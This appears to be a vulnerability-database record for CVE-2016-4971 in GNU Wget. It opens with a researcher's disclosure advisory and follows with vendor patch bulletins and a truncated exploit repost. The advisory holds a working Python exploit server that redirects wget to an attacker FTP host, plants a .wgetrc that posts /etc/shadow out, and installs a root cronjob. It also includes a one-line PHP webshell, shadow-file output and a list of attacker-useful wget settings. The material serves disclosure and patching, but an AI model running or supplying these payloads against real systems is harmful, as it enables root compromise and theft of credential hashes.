ftp://192.168.57.1/.bash_profile [following] \n=> \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 \nConnecting to 192.168.57.1:21... connected. \nLogging in as anonymous ... Logged in! \n==> SYST ... done. ==> PWD ... done. \n==> TYPE I ... done. ==> CWD not needed. \n==> SIZE .bash_profile ... 55 \n==> PASV ... done. ==> RETR .bash_profile ... done. \nLength: 55 (unauthoritative) \n \n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s \n \n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55] \n \n \nvictim@trusty:~$ ls -l \ntotal 4 \n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile \nvictim@trusty:~$ \n \n \nThis vulnerability will not work if extra options that force destination \nfilename are specified as a paramter. Such as: -O /tmp/output \nIt is however possible to exploit the issue with mirroring/recursive options \nenabled such as -r or -m. \n \nAnother limitation is that attacker exploiting this vulnerability can only \nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option). \nThis could however be enough to exploit wget run from home directory, or \nwithin web document root (in which case attacker could write malicious php files \nor .bash_profile files). \n \nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory. \n \nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget \nsettings such as destination directory for all downloaded files in future, \nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses. \n \n \nHere is a set of Wget settings that can be helpful to an attacker: \n \ndir_prefix = string \nTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122. \n \npost_file = file \nUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122. \n \nrecursive = on/off \nRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122. \n \ntimestamping = on/off \nAllows to overwrite existing files. \n \ncut_dirs = n \nIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option). \n \nhttp_proxy \nHTTP Proxy server \n \nhttps_proxy \nHTTPS Proxy server \n \noutput_document = file \nSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122. \n \ninput = file \nRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122. \n \nmetalink-over-http \nIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \nThen it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download. \n \n \n \nFull list of .wgetrc options can be found in: \n \nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands \n \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n1) Cronjob with wget scenario \n \nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner. \nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. \nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs: \n \nhttps://codex.wordpress.org/Post_to_your_blog_using_email \nhttps://docs.moodle.org/2x/ca/Cron \nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site \nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel \n \nSuch setup could be abused by attackers to upload .bash_profile file through \nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n \nAs cron runs priodically attackers, could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution. \n \n \nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests. \n \nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. \nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n \nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root. \n \n \nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget. \n \nThe root cronjob on the victim server may look as follows: \n \nroot@victim:~# cat /etc/cron.d/update-database \n# Update database file every 2 minutes \n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1 \n \n \nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server: \n \nattackers-server# mkdir /tmp/ftptest \nattackers-server# cd /tmp/ftptest \n \nattackers-server# cat <<_EOF_>.wgetrc \npost_file = /etc/shadow \noutput_document = /etc/cron.d/wget-root-shell \n_EOF_ \n \nattackers-server# sudo pip install pyftpdlib \nattackers-server# python -m pyftpdlib -p21 -w \n \n \nAt this point attacker can start an HTTP server which will exploit wget by \nsending malicious redirects to the victim wget's requests: \n \n---[ wget-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget 1.18 < Arbitrary File Upload Exploit \n# Dawid Golunski \n# dawid( at )legalhackers.com \n# \n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n# \n# CVE-2016-4971 \n# \n \nimport SimpleHTTPServer \nimport SocketServer \nimport socket; \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_GET(self): \n# This takes care of sending .wgetrc \n \nprint \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \nprint \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\" \nself.send_response(301) \nnew_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) ) \nprint \"Sending redirect to %s \\n\"%(new_path) \nself.send_header('Location', new_path) \nself.end_headers() \n \ndef do_POST(self): \n# In here we will receive extracted file and install a PoC cronjob \n \nprint \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\" \nif \"Wget\" not in self.headers.getheader('User-Agent'): \nprint \"But it's not a Wget :( \\n\" \nself.send_response(200) \nself.end_headers() \nself.wfile.write(\"Nothing to see here...\") \nreturn \n \ncontent_len = int(self.headers.getheader('content-length', 0)) \npost_body = self.rfile.read(content_len) \nprint \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body) \n \nprint \"Sending back a cronjob script as a thank-you for the file...\" \nprint \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\" \nself.send_response(200) \nself.send_header('Content-type', 'text/plain') \nself.end_headers() \nself.wfile.write(ROOT_CRON) \n \nprint \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\" \n \nreturn \n \nHTTP_LISTEN_IP = '192.168.57.1' \nHTTP_LISTEN_PORT = 80 \nFTP_HOST = '192.168.57.1' \nFTP_PORT = 21 \n \nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\" \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"Ready? Is your FTP server running?\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT) \nelse: \nprint \"FTP is down :( Exiting.\" \nexit(1) \n \nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n---[ eof ]--- \n \n \n \nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes \nthe aforementioned cronjob with wget. \n \nThe output should look similar to: \n \n \n---[ wget-exploit.py output ]--- \n \nattackers-server# python ./wget-exploit.py \n \nReady? Is your FTP server running? \nFTP found open on 192.168.57.1:21. Let's go then \n \nServing wget exploit on port 80... \n \n \nWe have a volunteer requesting /database.db by GET :) \n \nUploading .wgetrc via ftp redirect vuln. It should land in /root \n \n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 - \nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n \nWe have a volunteer requesting /database.db by POST :) \n \nReceived POST from wget, this should be the extracted /etc/shadow file: \n \n---[begin]--- \nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: \ndaemon:*:16484:0:99999:7::: \nbin:*:16484:0:99999:7::: \nsys:*:16484:0:99999:7::: \nsync:*:16484:0:99999:7::: \ngames:*:16484:0:99999:7::: \nman:*:16484:0:99999:7::: \nlp:*:16484:0:99999:7::: \n...cut... \n---[eof]--- \n \nSending back a cronjob script as a thank-you for the file... \nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) \n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 - \n \nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n \n---[ output eof ]--- \n \n \nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file \nsetting to /etc/shadow. \nTherefore, on the next wget run, wget sent back shadow file to the attacker. \nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver: \n \n \nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n \nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root) \n \n \n \n2) PHP web application scenario \n \nIf wget is used within a PHP script e.g.: \n \n<?php \n \n// Update geoip data \n \nsystem(\"wget -N -P geoip http://attackers-host/goeip.db\"); \n \n?> \n \nAn attacker who manages to respond to the request could simply upload a PHP \nbackdoor of: \n \n<?php \n//webshell.php \n \nsystem($_GET['cmd']); \n?> \n \nby using the wget-exploit script described in example 1. \n \nAfter the upload he could simply execute the script and their shell \ncommand by a GET request to: \n \nhttp://victims-php-host/geoip/webshell.php?cmd=id \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or \neven path (if wget is run from a home directory). \nDepending on the context in which wget is used, this could lead to \nuploading a web shell and granting the attacker access remote access to the \nsystem, or privilege escalation. It could be possible for attackers to escalate \nto root user if wget is run via root cronjob as it is often the case in web \napplication deployments and is recommended in some guides on the Internet. \n \nThe vulnerability could also be exploited by well-positioned attackers within \nthe networ who are able to intercept/modify the network traffic. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nAll versions of Wget before the patched version of 1.18 are affected. \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to wget version 1.18 as advertised by the vendor at: \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nLinux distributions should update their wget packages. It is recommended \nto update wget manually if an updated package is not available for your \ndistribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nhttp://www.ubuntu.com/usn/usn-3012-1/ \n \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n06.07.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137795/wget-fileuploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:03", "description": "USN-3012-1 Wget vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, wget\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nDawid Golunski discovered that Wget incorrectly handled filenames when being redirected from an HTTP to an FTP URL. A malicious server could possibly use this issue to overwrite local files.\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry cflinuxfs2 versions prior to 1.67.0 \n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.17 AND other versions prior to 3232.12 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * Upgrade to Cloud Foundry cflinuxfs2 versions 1.67.0 or later \n * The Cloud Foundry team has released patched BOSH stemcells 3146.17 and 3232.12 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.17 OR other versions to 3232.12 \n\n# Credit\n\nDawid Golunski\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-3012-1/>\n * <http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-4971>\n * <https://bosh.io/stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T00:00:00", "type": "cloudfoundry", "title": "USN-3012-1 Wget vulnerability | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T00:00:00", "id": "CFOUNDRY:6D0FE27767FA08BC6718743E9AB9EC99", "href": "https://www.cloudfoundry.org/blog/usn-3012-1/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "paloalto": [{"lastseen": "2021-07-28T14:33:16", "description": "The wget library has been found to contain a vulnerability (CVE 2016-4971). wget allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-59677/ CVE 2016-4971)\nSuccessfully exploiting this issue would require an attacker to be authenticated on the Management Interface.\nThis issue affects PAN-OS 6.1.16 and earlier, PAN-OS 7.0.14 and earlier, PAN-OS 7.1.9 and earlier, PAN-OS 8.0\n\n**Work around:**\nPalo Alto Networks recommends to implement best practice by allowing web interface access only to a dedicated management network. Additionally, restrict the set of IP addresses to a subset of authorized sources that you allow to interact with the management network.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-05-23T03:00:03", "type": "paloalto", "title": "WGET Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2017-05-23T03:00:03", "id": "PAN-SA-2017-0016", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ibm": [{"lastseen": "2022-06-28T21:58:48", "description": "## Summary\n\nPowerKVM is affected by a vulnerability in wget. IBM has now addressed this vulnerability.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4971_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>)** \nDESCRIPTION:** GNU wget could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted HTTP redirect message with an FTP server Location value to download and write or overwrite arbitrary files on the system. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114406_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114406>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n## Affected Products and Versions\n\nPowerKVM 2.1 and PowerKVM 3.1\n\n## Remediation/Fixes\n\nCustomers can update PowerKVM systems by using \"yum update\". \n\nFix images are made available via Fix Central. For version 3.1, see [_https://ibm.biz/BdHggw_](<https://ibm.biz/BdHggw>). This issue is addressed as of 3.1.0.2 update 3 or later.\n\nFor version 2.1, see [_https://ibm.biz/BdEnT8_](<https://ibm.biz/BdEnT8>). This issue is addressed as of PowerKVM 2.1.1.3-65 update 13 or later. Customers running v2.1 are, in any case, encouraged to upgrade to v3.1. \n\nFor v2.1 systems currently running fix levels of PowerKVM prior to 2.1.1, please see <http://download4.boulder.ibm.com/sar/CMA/OSA/05e4c/0/README> for prerequisite fixes and instructions.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n11 November 2016 - Initial Version\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSZJY4\",\"label\":\"PowerKVM\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;3.1\",\"Edition\":\"KVM\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-18T01:34:17", "type": "ibm", "title": "Security Bulletin: A vulnerability in wget affects PowerKVM", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2018-06-18T01:34:17", "id": "C57CB4EA12FFF65730206B718900EAEB6EFB3AEE18254CB007E3EAD2F81BB99B", "href": "https://www.ibm.com/support/pages/node/630103", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-13T01:30:13", "description": "## Summary\n\nA vulnerability with GNU wget affects IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data (CVE-2016-4971). Please see below for details on how to remediate this issue.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2016-4971](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>) \n** DESCRIPTION: **GNU wget could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted HTTP redirect message with an FTP server Location value to download and write or overwrite arbitrary files on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114406](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114406>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.7 \n \n\n\n## Remediation/Fixes\n\nPlease upgrade to IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data, version 4.0.8. This version can be obtained here: \n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=overview-whats-new>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n25 Apr 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSH3YV\",\"label\":\"IBM Speech to Text for IBM Cloud\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"4.0.0 - 4.0.7\",\"Edition\":\"All\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: A vulnerability with GNU wget affects\u00a0IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data (CVE-2016-4971)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2023-01-12T21:59:00", "id": "3212B53427A43325550BE8D76D8414CB80F59E8C098469790D9938A354FC4F5A", "href": "https://www.ibm.com/support/pages/node/6575485", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-21T23:23:38", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36167", "href": "https://0day.today/exploit/description/36167", "sourceData": "# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)\n# Original Exploit Author: Dawid Golunski\n# Exploit Author: liewehacksie\n# Version: GNU Wget < 1.18 \n# CVE: CVE-2016-4971\n\nimport http.server\nimport socketserver\nimport socket\nimport sys\n\nclass wgetExploit(http.server.SimpleHTTPRequestHandler):\n\n def do_GET(self):\n # This takes care of sending .wgetrc/.bash_profile/$file\n\n print(\"We have a volunteer requesting \" + self.path + \" by GET :)\\n\")\n if \"Wget\" not in self.headers.get('User-Agent'):\n print(\"But it's not a Wget :( \\n\")\n self.send_response(200)\n self.end_headers()\n self.wfile.write(\"Nothing to see here...\")\n return\n\n self.send_response(301)\n print(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. It should land in /home/ \\n\")\n new_path = 'ftp://[email\u00a0protected]{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)\n\n print(\"Sending redirect to %s \\n\"%(new_path))\n self.send_header('Location', new_path)\n self.end_headers()\n\n\nHTTP_LISTEN_IP = '192.168.72.2'\nHTTP_LISTEN_PORT = 80\nFTP_HOST = '192.168.72.4'\nFTP_PORT = 